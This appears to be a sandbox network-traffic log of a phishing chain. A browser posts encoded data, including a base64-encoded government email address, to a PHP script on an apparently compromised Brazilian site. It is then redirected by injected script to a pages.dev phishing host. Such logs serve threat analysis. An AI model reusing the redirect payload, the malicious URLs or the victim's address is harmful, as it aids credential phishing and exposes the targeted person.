                                                                2024-08-27 18:03:31 UTC411INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                Data Ascii: window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69
                                                                Data Ascii: ;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:functi
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73
                                                                Data Ascii: )),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProces
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30 3f 31
                                                                Data Ascii: =i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0?1
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b
                                                                Data Ascii: [4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0)+
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36 37 32
                                                                Data Ascii: %4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42949672
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29 2c 6d
                                                                Data Ascii: S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38]),m
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f
                                                                Data Ascii: e.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<<o
                                                                2024-08-27 18:03:31 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29 29 29
                                                                Data Ascii: nction(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)))


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.164973145.164.92.1884433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:33 UTC791OUTPOST /js/images/tvavx.php HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                Content-Length: 203
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: null
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:33 UTC203OUTData Raw: 63 6f 64 3d 34 34 36 33 36 63 34 32 34 33 37 33 34 31 37 37 34 34 34 31 35 30 34 32 34 38 37 39 35 38 33 33 32 66 37 33 35 61 34 36 36 62 35 39 37 39 36 38 34 61 36 31 34 34 35 31 33 39 33 39 36 35 35 38 35 30 36 33 37 61 36 64 34 66 36 34 37 36 35 38 36 65 34 61 34 37 36 66 34 62 34 35 34 64 36 38 35 36 33 31 34 39 36 37 34 64 37 31 36 39 37 33 34 34 36 63 34 38 37 31 35 34 33 37 36 63 35 61 34 33 36 32 33 38 35 30 36 32 33 38 34 65 36 61 36 38 33 35 35 39 34 38 33 31 36 61 36 34 32 66 26 65 3d 62 58 52 6f 59 57 39 41 63 32 46 75 64 47 46 6a 62 47 46 79 59 57 4e 68 4c 6d 64 76 64 67 25 33 44 25 33 44
                                                                Data Ascii: cod=44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f&e=bXRoYW9Ac2FudGFjbGFyYWNhLmdvdg%3D%3D
                                                                2024-08-27 18:03:33 UTC191INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:32 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html; charset=UTF-8
                                                                2024-08-27 18:03:33 UTC2160INData Raw: 38 36 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 6d 61 72 67 69 6e 3a
                                                                Data Ascii: 869<html><head><meta name="robots" content="noindex, nofollow"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style>body,html{margin:
                                                                2024-08-27 18:03:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.164973245.164.92.1884433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:33 UTC639OUTGET /favicon.ico HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:34 UTC164INHTTP/1.1 404 Not Found
                                                                Date: Tue, 27 Aug 2024 18:03:33 GMT
                                                                Server: Apache
                                                                Content-Length: 315
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                2024-08-27 18:03:34 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.164973545.164.92.1884433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:35 UTC899OUTPOST /js/images/tvavx.php HTTP/1.1
                                                                Host: www.estampariaimagemeacao.com.br
                                                                Connection: keep-alive
                                                                Content-Length: 201
                                                                Cache-Control: max-age=0
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                Origin: https://www.estampariaimagemeacao.com.br
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:35 UTC201OUTData Raw: 61 3d 34 34 36 33 36 63 34 32 34 33 37 33 34 31 37 37 34 34 34 31 35 30 34 32 34 38 37 39 35 38 33 33 32 66 37 33 35 61 34 36 36 62 35 39 37 39 36 38 34 61 36 31 34 34 35 31 33 39 33 39 36 35 35 38 35 30 36 33 37 61 36 64 34 66 36 34 37 36 35 38 36 65 34 61 34 37 36 66 34 62 34 35 34 64 36 38 35 36 33 31 34 39 36 37 34 64 37 31 36 39 37 33 34 34 36 63 34 38 37 31 35 34 33 37 36 63 35 61 34 33 36 32 33 38 35 30 36 32 33 38 34 65 36 61 36 38 33 35 35 39 34 38 33 31 36 61 36 34 32 66 26 62 3d 62 58 52 6f 59 57 39 41 63 32 46 75 64 47 46 6a 62 47 46 79 59 57 4e 68 4c 6d 64 76 64 67 25 33 44 25 33 44
                                                                Data Ascii: a=44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f&b=bXRoYW9Ac2FudGFjbGFyYWNhLmdvdg%3D%3D
                                                                2024-08-27 18:03:36 UTC176INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:34 GMT
                                                                Server: Apache
                                                                Access-Control-Allow-Origin: *
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                Content-Type: text/html
                                                                2024-08-27 18:03:36 UTC158INData Raw: 39 38 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 68 64 6a 61 6a 73 64 67 61 67 73 6a 68 66 67 64 66 64 68 61 66 67 68 6a 61 66 67 66 64 6a 67 61 68 64 66 67 73 67 64 66 67 68 64 73 6e 6d 66 62 73 64 73 2e 70 61 67 65 73 2e 64 65 76 2f 23 42 62 58 52 6f 59 57 39 41 63 32 46 75 64 47 46 6a 62 47 46 79 59 57 4e 68 4c 6d 64 76 64 67 3d 3d 22 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a
                                                                Data Ascii: 98<script>window.top.location.href = "https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==";</script>
                                                                2024-08-27 18:03:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.1649736172.66.47.1114433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:36 UTC743OUTGET / HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-Dest: document
                                                                Referer: https://www.estampariaimagemeacao.com.br/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:36 UTC782INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:36 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3Uqg4uSzwX5vGV4f3lct5fucIKuQDbKl6h1jZnodlnu14Iw5uSfOs6FY0MQ7OGgrDXkAek7h%2BwPQrxHjR1NiFFMoCn6%2BnR1apDiXBXA7IBjYphhgOC9Xu7fc3ukzP3T%2Bh0XCyiMahkH0RYGYtP3SQhbszTxBDBycK87CSNyvMOSeemdXnspEca0z%2BsWYDrzog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
